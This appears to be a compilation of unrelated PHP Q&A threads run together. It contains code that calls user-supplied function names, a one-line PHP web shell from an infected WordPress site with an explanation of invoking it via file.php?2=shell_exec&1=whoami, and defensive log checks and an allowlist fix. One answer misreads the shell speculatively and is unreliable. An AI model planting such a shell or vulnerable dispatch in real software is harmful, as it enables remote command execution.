I have the following code:
<?php
if(isset($_GET['function'])){
$_GET['function']();
}
?>
So if I entered this URL:
http://localhost/?function=phpinfo
I will see the phpinfo function output on the screen.
Can I have a way to concatenate 2 functions in the URL like this example:
http://localhost/?function=shell_exec('ls') AND phpinfo
So I want to see the first function output..
If you are asking why I need this, it is because I am pen testing a web application with this situation..
Thanks for the help..
With your given code example it is not possible to do what you want. All your functions, so shell_exec('ls') and phpinfo, will be interpreted as one string, which is then called as a function by calling it with added parentheses.
The only way that I can think of is using a variable parameter list, rather than just a single parameter. Get all the GET parameters in the function, and loop through them, executing each one.
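To illustrate the answers above (an added example, not code from the original posts): PHP treats the whole parameter value as a single function name, and a safer design lets the request select only from a fixed map of handlers. The action names `version` and `time` and the `dispatch()` helper are hypothetical.

```php
<?php
// Added example: allowlisted dispatch instead of calling $_GET['function']() directly.
// The action names and handlers are hypothetical, chosen only for illustration.

function dispatch(array $query): string
{
    // Fixed map of public action names to handlers; user input only selects a key
    // and is never used as a function name itself.
    $actions = [
        'version' => fn(): string => PHP_VERSION,
        'time'    => fn(): string => gmdate('c'),
    ];

    $name = $query['function'] ?? '';
    // Reject non-strings (e.g. ?function[]=x) and anything outside the map.
    if (!is_string($name) || !array_key_exists($name, $actions)) {
        return 'rejected';
    }
    return $actions[$name]();
}

// Constructed sample inputs: one allowed action, one real PHP function name,
// and the combined string from the question.
$samples = ['version', 'phpinfo', "shell_exec('ls') AND phpinfo"];

foreach ($samples as $s) {
    // is_callable() shows how PHP sees the raw string: only an exact,
    // existing function name resolves; the combined string is not a function.
    printf(
        "%-30s callable=%-5s dispatch=%s\n",
        $s,
        var_export(is_callable($s), true),
        dispatch(['function' => $s])
    );
}
```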
I have the following variables in my php test script :
$url="http://example.com";
$uri="/index.php";
$url="$url$uri";
echo $url;
This returns the values of 2 variables $url and $uri, and the result I get is:
http://example.com/index.php
My question is: if PHP processes variables from top to bottom, then why does "echo $url" not display the value of the first variable "http://example.com"?
And in this situation how will I be able to echo the value of the first variable? Do I need to move the first variable from top to middle?
$uri="/index.php";
$url="$url$uri";
$url="http://example.com";
echo $url;
Any ideas?
Is order of variables important in php?
Order of statements is. PHP does things in the order you tell it to do them.
if php processes variables from top to bottom then ,why does "echo $url" not display the value of first variable
It does. It's just that that variable no longer has the value you gave it on line 1 because you gave it a new value on line 3.
And in this situation how will I be able to echo the value of first variable?
There are lots of approaches to that and …
Do I need to move the first variable from top to middle?
… would do it, but makes the line $url="$url$uri"; entirely pointless.
You need to step back and think about what you actually want to achieve.
If you need to keep the URL to the site root around and have the combined URL available somewhere, then maybe introducing a third variable name is the way forward.
If you are just debugging and want to make sure the value of $url is right before you change it, then you should probably move your echo statement instead.
I extracted this from a WordPress site that happened to be infected and is being cleaned up by me.
<?php ($_=@$_GET[page]).@$_($_POST[404]);?>
I suspect this line to be SEO spam, but I am not able to get the meaning of this line.
It's a PHP shell. If you rewrite it to the URL file.php?2=shell_exec&1=whoami executes the command whoami on the shell. In your example, one param is passed by POST, one by GET. So it's a bit harder to call.
You could also call other functions with it. The first parameter is always the function name, the second is a parameter for the called function.
Apparently it's explained on http://h.ackack.net/tiny-php-shell.html (https://twitter.com/dragosr/status/116759108526415872) but the site doesn't load for me.
/edit: If you have access to the server log files, you can search them to see if the hacker used this shell. A simple egrep "(&|\?)2=.+" logs* on the shell should work. You only see half of the executed command (only the GET, not POST), but maybe this helps to see if the attacker actually used his script.
PS: That was answered before here
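A log check along the lines of the egrep suggestion above, added here as an example and not part of the original answer: it generalizes from the parameter name `2` to any query parameter whose value is a command-execution function name. The watchlist, the `suspiciousParams()` helper and the log lines are constructed assumptions; as the answer notes, POST bodies do not appear in access logs.

```php
<?php
// Added example: flag access-log requests whose query string carries a PHP
// function name as a parameter value. Watchlist and log lines are constructed.

const WATCHLIST = ['system', 'exec', 'shell_exec', 'passthru', 'popen', 'proc_open', 'assert'];

function suspiciousParams(string $logLine): array
{
    // Pull the request target out of a combined-log-format line: "METHOD /path?query HTTP/x"
    if (!preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $logLine, $m)) {
        return [];
    }
    $query = parse_url($m[1], PHP_URL_QUERY);
    if (!is_string($query)) {
        return [];                       // no query string, or unparsable target
    }
    parse_str($query, $params);          // also URL-decodes names and values

    $hits = [];
    foreach ($params as $name => $value) {
        // PHP function names are case-insensitive, so compare in lower case.
        if (is_string($value) && in_array(strtolower(trim($value)), WATCHLIST, true)) {
            $hits[$name] = $value;
        }
    }
    return $hits;
}

// Constructed sample lines (documentation IP ranges, made-up paths and sizes).
$sampleLog = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "POST /infected.php?page=shell_exec HTTP/1.1" 200 512',
    '198.51.100.4 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048',
    '203.0.113.7 - - [10/Oct/2023:13:57:12 +0000] "GET /file.php?2=System&1=whoami HTTP/1.1" 200 87',
];

foreach ($sampleLog as $line) {
    $hits = suspiciousParams($line);
    if ($hits !== []) {
        // Report the line and which parameter carried the function name.
        printf("%s\n  -> %s\n", $line, json_encode($hits));
    }
}
```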
Let's break this up a little bit:
($_=@$_GET[page]) . @$_($_POST[404]);
First, this is two expressions being concatenated with the period: () . ().
In the first expression, $_ = $_GET[page], $_ is a variable, and is being assigned = to the variable $_GET['page'], or perhaps the output of an anonymous function it references. If $_GET[page] does reference an anonymous function, the @ would be suppressing any errors from it.
The second expression, @ $_( $_POST[404] ); is starting off with error suppression @ of the anonymous function $_, which you can tell now is an anonymous function being called because it's followed by (. The argument passed to this function is $_POST['404'], and then the second parentheses just closes the call.
So I think your suspicions are correct; this looks like obfuscated code intended to look innocuous or part of the site. I suspect that the values for $_GET[page] and $_POST[404] are perhaps javascript strings whose echoing on the page would install malware or adware.
You can debug this more by looking at the values of those two variables and seeing what they are.
As best I can tell without knowing the values in GET and POST, it looks like the variable $_ is being assigned to the string $_GET[page], which would be whatever someone submits in the URL when they load the page. So, they are able to pass the string name of any function to the site and have it in PHP's scope.
Then, they are running that arbitrary function on the $_POST['404'] value. That value also is whatever the browser or user POSTs to the page.
The concatenation and outer parenthesis ().() might just be more obfuscation, or the point of this code might be to simply echo the results of this code on the page (to inject javascript) for example. But, it's also possible they are calling whatever function they want on whatever argument they've passed. I can't tell just by looking, but someone more conversant with PHP probably could.
Some functions in PHP (e.g. phpinfo, var_dump, print_r) have a direct output to the browser, and to store their result in a variable we need to use ob_* functions.
I cited the example of three of these functions. Do you know any more? Is there a list of these functions? Thank you.
Off the top of my head, I know that PHP's printf function will also echo its output instead of returning data. But to my knowledge, there's no list out there of all PHP functions that echo information rather than returning it.
A bit of a sidenote though, print_r actually has a boolean optional second parameter that allows you to control whether or not it echoes its output, or returns it.
I need to include two variables inside the brackets below, what's the correct way to do this please?
//Needs two variables stated
listDebug();
The proper syntax for passing 2 variables to a function in PHP looks like this:
//Needs two variables stated
listDebug($var1, $var2);
Edit:
Judging by the comments, it looks like listDebug() is a library function that only accepts one argument and that you cannot edit. It logs information to a database and its single argument represents the string to be logged. In this case, you want to log the value of 2 separate values. The most straightforward approach would be to simply concatenate them together like so:
listDebug($var1 . ' ' . $var2);
Is this what you are looking for?
listDebug($variable1,$variable2);
Will need more information if you are looking for more.
Seems like listDebug function implementation hasn't been written to accept more than one argument.
So you just cannot pass 2 arguments there. Call the function twice... or rewrite the function to respect second argument.
To get this to work instead I did listDebug($var1.$var2); Thanks for your replies and advice.
My goal is just to debug
function dbg($var){
echo "you have passed $var";
}
call dbg($test)
output:
you have passed test
call dbg("var")
output:
you have passed "var"
In PHP. Could anyone help me to do that?
Try this if $var is a global variable:
function dbg($var){
echo "you have passed {$GLOBALS[$var]}";
}
Well, the second case is fairly straightforward - you're passing a string and you want to display the string. No worries.
But for the first case, I'm afraid the answer is: No you can't.
Once inside the function, PHP doesn't know anything about the variable that was passed into it other than the value.
I can't really see that it would be of much value though. It would be trivial to change your code to pass in a name and a value -- ie something like this:
function dbg($name,$value) {
print "You passed $name, and the value was $value";
}
dbg('test',$test);
That's not really all that great either though -- you may as well just use print_r() and friends.
If you really want more powerful debugging tools, you should look into xDebug. It's a proper debugging tool for PHP, which allows you to step through the code line-by-line, and see the contents of variables at any point during the program run (among many other good features). It also integrates nicely with several popular IDEs.